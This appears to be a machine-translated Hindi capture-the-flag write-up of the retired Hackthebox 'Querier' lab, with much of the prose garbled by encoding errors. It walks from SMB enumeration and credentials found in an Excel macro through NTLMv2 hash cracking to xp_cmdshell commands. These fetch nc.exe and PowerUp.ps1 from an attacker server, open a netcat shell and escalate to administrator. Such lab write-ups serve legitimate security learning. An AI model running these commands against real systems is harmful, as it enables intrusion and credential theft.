Pentest "Hackthebox - Querier" рдХреЗ рд▓рд┐рдП рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рдорд╢реАрди рдХрд╛ рдорд╛рд░реНрдЧ

рдирдорд╕реНрдХрд╛рд░, рд╣реЗрдмреНрд░! рдЗрд╕ рдЖрд▓реЗрдЦ рдореЗрдВ, рдЖрдк MsSQL рдХреА рд╕реБрд╡рд┐рдзрд╛рдУрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рджреВрд░рд╕реНрде рд╕рд░реНрд╡рд░ рдкрд░ рд╣рдорд▓рд╛ рдХрд░рдиреЗ рдХреА рдПрдХ рд╡рд┐рдзрд┐ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдиреЗрдВрдЧреЗ, рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдлрд┐рдХреНрд╕рд┐рдВрдЧ рдХреЗ рд▓рд┐рдП рдПрдХ рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдмрдирд╛ рд╕рдХрддреЗ рд╣реИрдВ, рдФрд░ рд╡рд┐рдВрдбреЛрдЬ рдореЗрдВ рдПрдХ рдЦрд░рд╛рдм рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рд╕рдореВрд╣ рдиреАрддрд┐ рдХреЗ рд╕рдВрдЪрд╛рд▓рди рдХрд╛ рдПрдХ рдЙрджрд╛рд╣рд░рдгред

рдХрдЯреМрддреА рдХреЗ рддрд╣рдд, рд╣рдо Hackthebox рдкреЛрд░реНрдЯрд▓ рдкрд░ Querier рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рдорд╢реАрди рдХреЛ рдкрд╛рд░рд┐рдд рдХрд░рдиреЗ рдХреЗ рд╣рдорд╛рд░реЗ рдЕрдиреБрднрд╡ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдмрд╛рдд рдХрд░реЗрдВрдЧреЗред

рдЙрди рд▓реЛрдЧреЛрдВ рдХреЗ рд▓рд┐рдП рдЬреЛ рдпрд╣ рдирд╣реАрдВ рдЬрд╛рдирддреЗ рдХрд┐ рд╣реИрдХрдмреЙрдХреНрд╕ рдХреНрдпрд╛ рд╣реИ, рдпрд╣ рдПрдХ рдРрд╕рд╛ рдкреЛрд░реНрдЯрд▓ рд╣реИ рдЬрд╣рд╛рдВ рдЖрдк рдЕрднреНрдпрд╛рд╕ рдореЗрдВ рдЕрдкрдиреЗ рд╕рдмрд╕реЗ рдЕрдЪреНрдЫреЗ рдХреМрд╢рд▓ рдХрд╛ рдкрд░реАрдХреНрд╖рдг рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рд╕реНрд╡рдпрдВ рд╕реАрдЯреАрдПрдл рдХрд╛рд░реНрдп рдФрд░ рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рдорд╢реАрдиреЗрдВ рд╣реИрдВред

рддреНрдпрд╛рдЧ
рд╕реЗрд╡рд╛ рдХреЗ рдирд┐рдпрдо рдкрдврд╝реЗрдВ: " рди рд╕рд╛рдЭрд╛ рдХрд░реЗрдВ рдХрд┐ рдЖрдкрдиреЗ рдкреНрд░рддреНрдпреЗрдХ рдорд╢реАрди рдХреЛ рдЕрдиреНрдп рд╕рджрд╕реНрдпреЛрдВ рдХреЗ рд╕рд╛рде рдХреИрд╕реЗ рд╣реИрдХ рдХрд┐рдпрд╛ рд╣реИред рдЗрд╕рдореЗрдВ рдЖрдордВрддреНрд░рдг рдХреЛрдб рдкреАрдврд╝реА рдФрд░ рд╕рднреА рдЪреБрдиреМрддрд┐рдпрд╛рдВ рд╢рд╛рдорд┐рд▓ рд╣реИрдВ ред тАЭ рд▓реЗрдХрд┐рди рдЪреВрдВрдХрд┐ рдпрд╣ рдорд╢реАрди рдЕрдм рд╕рдХреНрд░рд┐рдп рдирд╣реАрдВ рд╣реИ рдФрд░ рд░рд┐рдЯрд╛рдпрд░реНрдб рдорд╢реАрдиреЛрдВ рдХреЗ рдЦрдВрдб рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реИ, рдХреЗрд╡рд▓ рд╡реАрдЖрдИрдкреА рд╕рджрд╕реНрдп рд╣реА рдЗрд╕реЗ рдПрдХреНрд╕реЗрд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред



рдЬрд╛рдирдХрд╛рд░реА рдЬреБрдЯрд╛рдирд╛


рдкреЛрд░реНрдЯ рдиреИрдкрд┐рдВрдЧ рдХреЗ рд╕рд╛рде рдкреЛрд░реНрдЯ рд╕реНрдХреИрдирд┐рдВрдЧ рд╢реБрд░реВ рдХрд░рдХреЗ рд╣рдорд╛рд░реА рдЦреЛрдЬ рд╢реБрд░реВ рдХрд░реЗрдВред

nmap тАУsC тАУPn тАУA 10.10.10.125 



рд╣рдордиреЗ рдкрд╛рдпрд╛ рдмрдВрджрд░рдЧрд╛рд╣реЛрдВ рдХреА рд╕реВрдЪреАред

139/445 / tcp (smb) рдХреА рдЧрдгрдирд╛ рдХрд░реЗрдВ


рд╣рдо SMB рд╕рд░реНрд╡рд░ рд╕рдВрд╕рд╛рдзрдиреЛрдВ рддрдХ рдкрд╣реБрдВрдЪрдиреЗ рдХреЗ рд▓рд┐рдП smbclient рдЙрдкрдпреЛрдЧрд┐рддрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВрдЧреЗред

 smbclient тАУL //10.10.10.125 

рд╕рднреА рд╕рдВрд╕рд╛рдзрдиреЛрдВ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЬрд╛рдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдо рд░рд┐рдкреЛрд░реНрдЯ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ "рдореБрджреНрд░рд╛ рд╡реЙрд▓реНрдпреВрдо Report.xlsm" рдлрд╝рд╛рдЗрд▓ рдвреВрдВрдврддреЗ рд╣реИрдВред



рдпрджрд┐ рдЖрдк рдорд╛рдирдХ Microsoft Excel рдХреЗ рд╕рд╛рде рдЗрд╕ рдлрд╝рд╛рдЗрд▓ рдХреЛ рдЦреЛрд▓рддреЗ рд╣реИрдВ, рддреЛ рдпрд╣ рдкрд╣рд▓реА рдирдЬрд╝рд░ рдореЗрдВ рдкреВрд░реА рддрд░рд╣ рд╕реЗ рдЦрд╛рд▓реА рджрд┐рдЦрд╛рдИ рджреЗрдЧрд╛ ред

рд╣рдо рдмрд┐рдирд╡реЙрдХ рдЙрдкрдпреЛрдЧрд┐рддрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдлрд╝рд╛рдЗрд▓ рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░рддреЗ рд╣реИрдВ, рдЬреЛ рдЖрдкрдХреЛ xlsm рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдХреА рдПрдореНрдмреЗрдбреЗрдб рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рджреЗрдЦрдиреЗ рдореЗрдВ рдорджрдж рдХрд░реЗрдЧрд╛ред



рдмрд┐рдирд╡реЙрдХ рдХреЗ рдЖрдЙрдЯрдкреБрдЯ рд╕реЗ, рд╣рдореЗрдВ xlsm рдореЗрдВ рдирд┐рд╣рд┐рдд рдХреБрдЫ рджрд┐рд▓рдЪрд╕реНрдк рдлрд╛рдЗрд▓реЗрдВ рдорд┐рд▓реАрдВред
-рдИ рдзреНрд╡рдЬ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛, рдЗрд╕реЗ рдЕрдирдкреИрдХ рдХрд░рдирд╛ред

 binwalk тАУe Currency\ Volume\ Report.xlsm 



рдЕрдм рд╣рдо рд╕реНрдЯреНрд░реИрдВрде рдпреВрдЯрд┐рд▓рд┐рдЯреА рдХреЛ рдЖрдЙрдЯрдкреБрдЯ рдкреНрд░рд┐рдВрдЯреЗрдб рдХреИрд░реЗрдХреНрдЯрд░реНрд╕ рдХреЗ рд▓рд┐рдП рдЗрд╕реНрддреЗрдорд╛рд▓ рдХрд░реЗрдВрдЧреЗред рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЬрд╛ рд░рд╣реЗ рд╣реИрдВ, рд╣рдо vbaProject.bin рдореЗрдВ рджрд┐рд▓рдЪрд╕реНрдк рдбреЗрдЯрд╛ рдкрд╛рддреЗ рд╣реИрдВред рдРрд╕рд╛ рд▓рдЧрддрд╛ рд╣реИ рдХрд┐ рд╣рдореЗрдВ mssql рд╕рд░реНрд╡рд░ рдХреЗ рд▓рд┐рдП рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдорд┐рд▓ рдЧрдПред



рд╡рд░реНрддрдорд╛рди рдореЗрдВ рдкреНрд░рд╛рдкреНрдд рдЬрд╛рдирдХрд╛рд░реА рдХреЛ рд╕рдВрдХреНрд╖реЗрдк рдореЗрдВ рдкреНрд░рд╕реНрддреБрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП:

  • рд╣рдо рдЬрд╛рдирддреЗ рд╣реИрдВ рдХрд┐ mssql рд╕рд░реНрд╡рд░ 10.10.10.125:1433 рдкреЛрд░реНрдЯ рдкрд░ рдШреВрдо рд░рд╣рд╛ рд╣реИ;
  • рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ mssql рд╕рд░реНрд╡рд░ рд╕реЗ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рд╣реИрдВред

рддреЛ рдЖрдЗрдП рдЗрдореНрдкреИрдХреНрдЯ рдореЙрдбреНрдпреВрд▓ рд╕реЗ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕рд░реНрд╡рд░ рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВред

 python mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth 

MsSQL рддрдХ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред



MsSQL рдХреА рдЧрдгрдирд╛ рдХрд░реЗрдВ


рд╣рдо рд▓реЗрдЦ рд╕реЗ рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╣рдорд╛рд░реЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧреА рдЬрд╛рдирдХрд╛рд░реА рд╕реВрдЪреАрдмрджреНрдз рдХрд░рддреЗ рд╣реИрдВред
SQLi рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдореЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ mssql-svc рдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рд╕реЗ рдПрдХ рд╣реИрд╢ рдорд┐рд▓рддрд╛ рд╣реИред



рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рд╕реНрдкрд╖реНрдЯ рд░реВрдк рд╕реЗ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдЖрдкрдХреЗ рд▓рд┐рдП рд╕реБрд╡рд┐рдзрд╛рдЬрдирдХ рдХрд┐рд╕реА рднреА рдЙрдкрдХрд░рдг рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЗрд╕реЗ рдирд┐рдХрд╛рд▓рдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИред

  1.  john --format=netntlmv2 hash.txt 
  2.  hashcat -m 5600 -a 3 hash.txt 

рд╣рдореЗрдВ mssql-svc рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдорд┐рд▓рддрд╛ рд╣реИ ред

рдирдП рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдЛрдг рдХреЗ рд╕рд╛рде SQL рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдирд╛ред

 python mssqlclient.py QUERIER/mssql-svc:'corporate568'@10.10.10.125 -windows-auth 

рдЗрд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдЕрдзрд┐рдХрд╛рд░ рд╣рдореЗрдВ xp_cmdshell рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреЗ рд╣реИрдВ

Xp_cmdshell рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ
MsSQL рдЬрд╣рд╛рдЬ рдЙрдиреНрдирдд рд╕рдВрдЧреНрд░рд╣рд┐рдд рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЗ рдПрдХ рдмрдбрд╝реЗ рд╕реЗрдЯ рдХреЗ рд╕рд╛рдеред рдЙрдирдореЗрдВ рд╕реЗ рд╕рдмрд╕реЗ рджрд┐рд▓рдЪрд╕реНрдк xp_cmdshell рд╣реИред рдпрд╣ рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдо рдХреА рдХрдорд╛рдВрдб рд▓рд╛рдЗрди рддрдХ рдкрд╣реБрдВрдЪ рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред

рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ


рд╣рдо рдиреЗрдЯрдХреИрдЯ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░ рд░рд╣реЗ рд╣реИрдВ, рдЗрд╕рдХреЗ рд▓рд┐рдП рд╣рдореЗрдВ рдЗрд╕реЗ рд╣рдорд▓реЗ рд╡рд╛рд▓реЗ рд╕рд░реНрд╡рд░ рдкрд░ рдЕрдкрд▓реЛрдб рдХрд░рдирд╛ рд╣реЛрдЧрд╛ред

рд╣рдо рдЕрдкрдиреА рдорд╢реАрди рдкрд░ рдЙрд╕ рдбрд╛рдпрд░реЗрдХреНрдЯрд░реА рдореЗрдВ рдЬрд╛рддреЗ рд╣реИрдВ, рдЬрд╣рд╛рдБ netcat рд╕реНрдерд┐рдд рд╣реИ рдФрд░ рдЪрд▓рддреА рд╣реИ:

 python тАУm SimpleHTTPServer 

Mscql рд╢реЗрд▓ рдореЗрдВ рджреВрд░рд╕реНрде рд╕рд░реНрд╡рд░ рдкрд░ netcat (nc.exe) рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдкреЙрд╡рд░рд╢реЗрд▓ рдХрдорд╛рдВрдб рдЪрд▓рд╛рдПрдВ, рд╕реЗрд╡ рдкрде рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░реЗрдВред

 xp_cmdshell "powershell.exe Invoke-WebRequest "http://10.10.xx:8000/nc.exe" тАУ OutFile "C:\Users\mssql-svc\Desktop\nc.exe" " 

рд╣рдо рдкреЛрд░реНрдЯ 4444 рдкрд░ рд╕реБрдирдиреЗ рдХреЗ рд▓рд┐рдП рдиреЗрдЯрдХреИрдЯ рд╢реБрд░реВ рдХрд░рддреЗ рд╣реИрдВред

 xp_cmdshell "powershell C:/Users/mssql-svc/Desktop/nc.exe -l -p 4444 -e cmd.exe" 

рд╣рдо рдЕрдкрдиреА рддрд░рдл рд╕реЗ рдиреЗрдЯрдХреИрдЯ рд╢реБрд░реВ рдХрд░рддреЗ рд╣реИрдВ, рд╣рдорд▓реЗ рд╡рд╛рд▓реЗ рд╕рд░реНрд╡рд░ рдХреЗ рдЖрдИрдкреА рдФрд░ рдкреЛрд░реНрдЯ рдХреЛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░рддреЗ рд╣реИрдВ рдФрд░ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рддреЗ рд╣реИрдВред

 nc 10.10.10.125 4444 

рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛рдиреЗ рдХреЗ рд▓рд┐рдП PowerShellMafia рд╕реЗ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЪрд▓рд╛рдПрдБред

 powershell.exe IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.xx:8000/PowerUp.ps1\"); Invoke-AllChecks 



рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЗ рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк, рд╣рдореЗрдВ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдорд┐рд▓ рдЧрдПред

рд╣рдо рдирдП рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдФрд░ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЗ рд╕рд╛рде smb рд╕рдВрд╕рд╛рдзрдиреЛрдВ рдкрд░ рдЬрд╛рддреЗ рд╣реИрдВред





Root.txt рдлреНрд▓реИрдЧ рд▓реЗрдВред рдЬреАрдд!

Source: https://habr.com/ru/post/hi465687/


All Articles